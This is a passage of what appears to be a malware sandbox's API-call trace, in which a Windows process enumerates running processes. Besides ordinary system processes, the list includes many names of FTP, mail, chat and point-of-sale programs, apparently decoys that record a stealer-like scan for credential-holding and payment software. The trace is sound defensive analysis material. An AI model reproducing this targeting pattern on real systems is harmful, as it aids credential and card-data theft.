CloseHandle (hObject=0x11cc) returned 1 [0205.006] Sleep (dwMilliseconds=0x64) [0205.154] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0205.170] Process32First (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.172] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0205.174] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0205.177] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.179] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0205.182] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.186] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0205.188] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0205.190] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0205.192] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.195] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.197] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0205.223] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.225] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.227] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.232] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.234] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.236] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.239] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.241] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0205.244] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0205.249] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0205.252] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.254] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.257] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0205.259] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0205.312] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0205.315] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0205.317] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.320] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0205.322] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0205.327] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.329] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0205.331] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0205.333] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0205.335] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0205.337] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0205.341] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0205.343] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0205.346] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0205.348] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0205.351] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0205.353] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0205.405] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0205.408] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0205.411] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0205.457] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0205.463] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0205.474] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0205.476] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0205.478] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0205.566] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0205.568] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0205.570] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0205.572] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0205.577] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0205.579] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0205.581] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0205.584] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0205.586] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0205.592] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0205.595] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0205.597] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0205.600] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0205.603] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0205.673] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0205.675] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0205.678] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0205.680] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0205.687] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0205.689] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0205.692] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0205.694] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0205.697] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0205.702] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0205.704] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0205.707] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0205.709] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0205.711] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0205.761] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0205.766] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0205.768] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0205.770] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0205.771] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, 